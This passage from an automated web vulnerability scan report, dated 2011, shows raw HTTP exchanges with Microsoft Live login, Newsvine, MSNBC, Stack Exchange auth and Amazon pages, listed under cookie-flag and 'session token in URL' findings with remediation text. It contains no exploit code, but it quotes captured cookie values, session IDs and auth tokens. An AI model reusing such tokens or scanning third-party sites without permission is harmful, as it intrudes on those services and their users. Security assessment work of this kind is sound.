GET /resetpw.srf HTTP/1.1 Host: login.live.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mktstate=S=821848180&U=&E=&P=&B=en-us; xidseq=1; MSPRequ=lt=1296342779&id=251248&co=1; E=P:+YS7nCCOzYg=:9a/xBpNSiIAnbLqWtakDxo+wuvmRENPdouyOF/TBWFA=:F; mkt1=norm=en-us; MSPOK=$uuid-01208158-4468-4c60-bed2-dee9dc622cce$uuid-af80d4b3-da4e-4da7-ad81-1b243509eccc; wlidperf=throughput=15&latency=192; xid=feb5de0d-c322-4fbd-9773-2de0986e2107&&BL2xxxxxxC504&61; MUID=DC63BAA44C3843F38378B4BB213E0A6F; wla42=;
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 29 Jan 2011 23:13:17 GMT Server: Microsoft-IIS/6.0 PPServer: PPV: 30 H: BAYIDSLGN1H48 V: 0 Content-Type: text/html; charset=utf-8 Expires: Sat, 29 Jan 2011 23:12:17 GMT Cache-Control: no-cache Pragma: no-cache P3P: CP="DSP CUR OTPi IND OTRi ONL FIN" X-XSS-Protection: 0 Set-Cookie: MSPOK=$uuid-01208158-4468-4c60-bed2-dee9dc622cce$uuid-af80d4b3-da4e-4da7-ad81-1b243509eccc$uuid-4b999dd4-4e4f-4340-b8dc-e3af3429245c; path=/;version=1 Set-Cookie: MSPBack=0; domain=login.live.com;path=/;version=1 Content-Length: 1188
<html><head><noscript>JavaScript required to sign in<meta http-equiv="Refresh" content="0; URL=https://login.live.com/jsDisabled.srf?mkt=EN-US&lc=1033"/></noscript><title>Continue</title><script type= ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ppsecure/post.srf HTTP/1.1 Host: msnia.login.live.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 29 Jan 2011 23:14:43 GMT Server: Microsoft-IIS/6.0 PPServer: PPV: 30 H: TK2IDSMLGN1C04 V: 0 Content-Type: text/html; charset=utf-8 Expires: Sat, 29 Jan 2011 23:13:43 GMT Cache-Control: no-cache Pragma: no-cache P3P: CP="DSP CUR OTPi IND OTRi ONL FIN" X-XSS-Protection: 0 Set-Cookie: MSPOK=$uuid-0b57eae4-cbe7-4619-b132-61d19b680035; domain=login.live.com;path=/;version=1 X-Frame-Options: deny Content-Length: 11551
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /b HTTP/1.1 Host: sb.voicefive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Moved Temporarily Content-Length: 0 Location: https://sb.voicefive.com/b2? Date: Sun, 30 Jan 2011 01:37:06 GMT Connection: close Set-Cookie: UID=c9bed8b-173.223.190.110-1296351426; expires=Tue, 29-Jan-2013 01:37:06 GMT; path=/; domain=.voicefive.com P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC" Expires: Mon, 01 Jan 1990 00:00:00 GMT Pragma: no-cache Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate Server: CS
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.newsvine.com Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: sprout=2_PqiLNG8SFmQW8X%2BSbvHhIaQDDrylppT5AYg38YcbZ9nVTR8kG5RsiVu%2Byu1tJBD9uostGX%2FgO7wgSaC9LY0BxepgpfVGhwtOvjqbjk9G%2F0aWJY3jKGNJFq0uN4pAaO2V7eJc%2FrvMgTEqRy9ueckdj0wQyfJmL0oh4o9pwBcp9RbpE129gAZ0vY9RD8lhmoOR3DT1xy5pJRukUI4myv8AbN7gTgSVWGrjBguMbtU2gBmjNsA9C6eGORSajKZnC%2B%2B0; TZM=-360; jt_time=1296399959031; vid=d22bc33559f8a0701e021885c03ad2c9; s_cc=true; s_sq=%5B%5BB%5D%5D
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 17:02:03 GMT Server: Apache/2.2.9 (Debian) Vary: negotiate,Accept-Encoding TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Set-Cookie: vid=55d515b4f7dadf9aee6395750020b187; expires=Sat, 25-Jan-2031 17:02:03 GMT; path=/; domain=.newsvine.com Cache-Control: no-store, private, no-cache, must-revalidate Pragma: no-cache Keep-Alive: timeout=3, max=999 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Length: 56108
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <meta http-equiv="Content-Ty ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /_action/user/logout HTTP/1.1 Host: www.newsvine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Sun, 30 Jan 2011 03:20:10 GMT Server: Apache/2.2.9 (Debian) Vary: negotiate,Accept-Encoding TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Set-Cookie: vid=a518bd3650bb791008fc921ee62dad0e; expires=Sat, 25-Jan-2031 03:20:10 GMT; path=/; domain=.newsvine.com Pragma: no-cache Set-Cookie: sprout=deleted; expires=Sat, 30-Jan-2010 03:20:14 GMT; path=/; domain=.newsvine.com Location: http://www.newsvine.com/_action/user/logout?domains=newsvine.msnbc.redacted,newsvine.nbcsports.msnbc.com,newsvine.todayshow.com,newsvine.today.com&redirect=http%3A%2F%2Fwww.newsvine.com%3F1272465988 Content-Length: 0 Content-Type: text/html; charset=UTF-8 Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /_nv/accounts/global/information HTTP/1.1 Host: www.newsvine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Sun, 30 Jan 2011 01:22:51 GMT Server: Apache/2.2.9 (Debian) P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Set-Cookie: vid=3baaa49edd0123eafe283532e331e3c0; expires=Sat, 25-Jan-2031 01:22:51 GMT; path=/; domain=.newsvine.com Location: https://www.newsvine.com/_nv/accounts/accountSettingsLogin?tab=global&item=information&redirect=https%3A%2F%2Fwww.newsvine.com%2F_nv%2Faccounts%2Fglobal%2Finformation Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /_nv/accounts/login HTTP/1.1 Host: www.newsvine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 01:58:45 GMT Server: Apache/2.2.9 (Debian) P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Set-Cookie: vid=f8216a56010cce7056bb2bebc2b8ea2f; expires=Sat, 25-Jan-2031 01:58:45 GMT; path=/; domain=.newsvine.com Cache-Control: no-store, private, no-cache, must-revalidate Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 10103
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <meta http-equiv="Content-Ty ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /_nv/accounts/msnbc/emailAlerts HTTP/1.1 Host: www.newsvine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 03:14:53 GMT Server: Apache/2.2.9 (Debian) P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Set-Cookie: vid=0e0c419af9db7beaa9782211b1d63042; expires=Sat, 25-Jan-2031 03:14:53 GMT; path=/; domain=.newsvine.com Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /_nv/accounts/msnbc/newsletters HTTP/1.1 Host: www.newsvine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 01:23:00 GMT Server: Apache/2.2.9 (Debian) P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Set-Cookie: vid=612c76b17edbcde9ea20fe784e8a625d; expires=Sat, 25-Jan-2031 01:23:00 GMT; path=/; domain=.newsvine.com Cache-Control: no-store, private, no-cache, must-revalidate Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 41168
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <meta http-equiv="Content- ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /_nv/accounts/register HTTP/1.1 Host: www.newsvine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 01:22:53 GMT Server: Apache/2.2.9 (Debian) P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Set-Cookie: vid=209e83103b98465a328a2c9ac4b644ca; expires=Sat, 25-Jan-2031 01:22:53 GMT; path=/; domain=.newsvine.com Cache-Control: no-store, private, no-cache, must-revalidate Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 11769
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <meta http-equiv="Content-Ty ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /_nv/api/accounts/login HTTP/1.1 Host: www.newsvine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 01:22:51 GMT Server: Apache/2.2.9 (Debian) P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Set-Cookie: vid=aa6836e6849505e061ea2e467e70f836; expires=Sat, 25-Jan-2031 01:22:51 GMT; path=/; domain=.newsvine.com Cache-Control: max-age=60 Expires: Sun, 30 Jan 2011 01:23:51 GMT Vary: Accept-Encoding Content-Length: 97 Content-Type: application/json Connection: close
{"data":{"errors":{"L2":"Please enter your email address and password."}},"statusCode":"failure"}
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /_nv/api/accounts/resetPassword HTTP/1.1 Host: www.newsvine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 03:14:02 GMT Server: Apache/2.2.9 (Debian) P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Set-Cookie: vid=b87462d701086cc5258ca445f8422d6b; expires=Sat, 25-Jan-2031 03:14:02 GMT; path=/; domain=.newsvine.com Cache-Control: max-age=60 Expires: Sun, 30 Jan 2011 03:15:02 GMT Vary: Accept-Encoding Content-Length: 100 Content-Type: application/json Connection: close
{"data":{"errors":{"RP1":"Please enter your email address or domain name."}},"statusCode":"failure"}
11. Session token in URLpreviousnext There are 21 instances of this issue:
Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.
Issue remediation
The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.
GET /go/286026710/direct;vt.1;ai.195291342;ct.$num$/01/&ArmClickToken=$num$ver=1&clickTag1=!~!click!~!http://clk.redcated/go/286026710/direct;vt.1;ai.195291342;ct.1/01&clickTag2=!~!click!~!http://clk.redcated/go/286026710/direct;vt.1;ai.195291342;ct.2/01&clickTag3=!~!click!~!http://clk.redcated/go/286026710/direct;vt.1;ai.195291342;ct.3/01&clickTag4=!~!click!~!http://clk.redcated/go/286026710/direct;vt.1;ai.195291342;ct.4/01&clickTag5=!~!click!~!http://clk.redcated/go/286026710/direct;vt.1;ai.195291342;ct.5/01&clickTag6=!~!click!~!http://clk.redcated/go/286026710/direct;vt.1;ai.195291342;ct.6/01 HTTP/1.1 Host: clk.redcated Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Object moved Cache-Control: no-store Content-Length: 0 Expires: 0 Location: http://us.ishares.com/home.htm?cmp=keepevolving&chn=BA&c=MSN P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC" Set-Cookie: AA002=001296353223-3933257; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: MUID=0A4C5DE803D0423D892C3F0C8538F026; expires=Thursday, 18-Aug-2011 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: ach00=bab9/1c5b3; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: ach01=ba3e8ce/1c5b3/110c6bd6/bab9/4d44c7c7; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated Connection: close Date: Sun, 30 Jan 2011 02:07:03 GMT Connection: close
GET / HTTP/1.1 Host: cosmiclog.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache/2.2.9 (Debian) TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Type: text/html Cache-Control: max-age=300 Date: Sun, 30 Jan 2011 02:07:57 GMT Connection: close Connection: Transfer-Encoding Content-Length: 145284
<!DOCTYPE HTML> <html lang="en"><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" /> <title>Cosmic Log</title> <meta ...[SNIP]... <p>Bomb-sniffing plants could make airport security a whole lot greener – at least until a bomb-packing terrorist walks by and causes the leaves to turn white, <a target="_blank" href="http://www.plosone.org/article/info%3Adoi%2F10.1371%2Fjournal.pone.0016292;jsessionid=9E6895D8F62E08DA00CA29E1E6705A22.ambra02">researchers report in the journal PLoS ONE</a> ...[SNIP]...
GET /gas-traffic.aspx HTTP/1.1 Host: local.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 02:09:28 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA27 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=5b47497cc43743d9be4c3d0002efa31f; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=72D4472BCF114A3497BE87B9061DAD51; domain=.redacted; expires=Thu, 18-Aug-2011 02:09:28 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 44553
GET /hourly.aspx HTTP/1.1 Host: local.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:47:52 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA25 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=fe9b558f11c048c5b0bcfead5c27909c; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=D700EC8FE6A84E6E86AF10C957726EEB; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:52 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 52446
GET /movies-events.aspx HTTP/1.1 Host: local.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:47:43 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA28 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=362ea74ed69b4e3e91979daf6227ebc5; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=54E9E8A3E60641D9AC7FE4403046D572; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:43 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 59606
GET /news.aspx HTTP/1.1 Host: local.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:47:29 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA32 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=3953a7e65afb42b0ade3749d752dcf1c; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=C14043A1E67E44BCAA9A3B68AA8AFD89; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:29 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 45752
GET /restaurants.aspx HTTP/1.1 Host: local.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:47:45 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA31 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=11c3bf43b93e4ed9af237f65b02844d7; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=47142BBDAAA74E00893F20DA82ED8C2E; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:45 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 49227
GET /sports.aspx HTTP/1.1 Host: local.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:47:41 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA27 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=d11d2c165e674866abd16c8b8cb9e1bb; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=A7A43B87D4E04DEA9AC850EC95E92AE2; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:41 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 94929
GET /ten-day.aspx HTTP/1.1 Host: local.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:47:49 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA29 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=b091c91e5f57464f867c86a6838b0181; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=5D4B178CF6734098BD0B688BB765F218; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:49 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 49042
GET /weather.aspx HTTP/1.1 Host: local.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:47:33 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA30 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=fd5b4d05da194df0bdd44cf8adbd21ef; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=2B70DCC8FEC94F45B962D0715AF96955; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:33 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 48963
GET /auth/global/read?request=lNFEJmiMWRvnZEvOWYpUnSipo9yf2IIGqtPflTj16ER0fdpDutY%2BTxasmc8BrnyYDeYjNVIsJs2AVBeBqTJirA%3D%3D&nonce=on9FTQAAAACIr5drBee4yA%3D%3D HTTP/1.1 Host: stackauth.com Proxy-Connection: keep-alive Referer: http://stackoverflow.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Date: Sun, 30 Jan 2011 15:11:31 GMT Content-Length: 1199
<html><head> <script type='text/javascript'> var data = {"ReadSession":"http://stackauth.com/auth/global/read-session","Request":"lNFEJmiMWRvnZEvOWYpUnSipo9yf2IIG ...[SNIP]...
GET / HTTP/1.1 Host: thelastword.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache/2.2.9 (Debian) TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Type: text/html Cache-Control: max-age=300 Date: Sun, 30 Jan 2011 02:55:21 GMT Connection: close Connection: Transfer-Encoding Content-Length: 67375
GET /gp/product/0470650923 HTTP/1.1 Host: www.amazon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:29:33 GMT Server: Server x-amz-id-1: 0FB6KRV0MVS1BJJ37AT4 p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC " x-amz-id-2: l51TKC8bD5OicdfsGYvcPObyVpYJLR9Rx7zE2Y4nwPxVFwBYnt1W1uWwp6YohY8J Vary: Accept-Encoding,User-Agent Content-Type: text/html; charset=ISO-8859-1 Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT Set-cookie: session-id=181-4491985-5345663; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT Content-Length: 409295
GET /gp/product/0672333368?ie=UTF8&tag=varioussite07-20&linkCode=as2&camp=1789&creative=9325&creativeASIN=0672333368 HTTP/1.1 Host: www.amazon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:29:33 GMT Server: Server x-amz-id-1: 04VBMFPBJXZ8J962J8W2 p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC " x-amz-id-2: fH3WLv3Jzmox2K4JTSORqyP3dG78f8/Z57/rsvJ+e57X3LhuWxe1LUoVMzwVuNdD Vary: Accept-Encoding,User-Agent Content-Type: text/html; charset=ISO-8859-1 Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT Set-cookie: session-id=185-0119564-6236271; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT Set-cookie: UserPref=Oel7bYwRWS1gKV5RSiNZiK5lZAAokMgjRBrE5HDUyc9ir04+EELG8B5ZvPf93p6q/Wug8LCjECLDGs1NV2Ss5CncqyEhzH4Xx7dc9WlLyukc31H5gDwd1M0N2+5dFhG9r9UQX7bBDo1UvRUWe9CKYp29GbQIzzh4/e34AfsAPvBx1HVvihnL6R0of1OO3HpDP4AGMQXekYYMU4xOPcaCZk0VUxYwQP/RumeAVnei2D4rad8Xugnf2lk0nqBj3rkP6vzCnoFEzmbe3GgDLzEstwODPn9gW6oauV3yNspeqzecQNyMXmsDy/UrRjAUYndEw91zCgoaiXhnp39HquunCVQJJv/M/EGP7xhqBuRl49vBAGLgp8yRAJwJEgmd86mQGKHoS1Ku4VfxXIMdaRhhkLOtFXZRjef7VWDgVqemNz4+2YF2kiCxAGs6W/ltnCEp33kcaW9Sa6E=; path=/; domain=.amazon.com; expires=Sat Feb 05 23:29:33 2011 GMT Content-Length: 386121
GET /gp/product/0981511821 HTTP/1.1 Host: www.amazon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:30:30 GMT Server: Server x-amz-id-1: 0XB1D4PZ9419ZYHZPFK1 p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC " x-amz-id-2: paCmRy1sJia9Yo22kUbZJqup3sUmP5UPhjF9KZKfoPPtyZa2vqwpTeDVQZrYvCgc Vary: Accept-Encoding,User-Agent Content-Type: text/html; charset=ISO-8859-1 Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT Set-cookie: session-id=177-1907126-9874658; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT Content-Length: 325743
<html> <head>
<style type="text/css"><!--
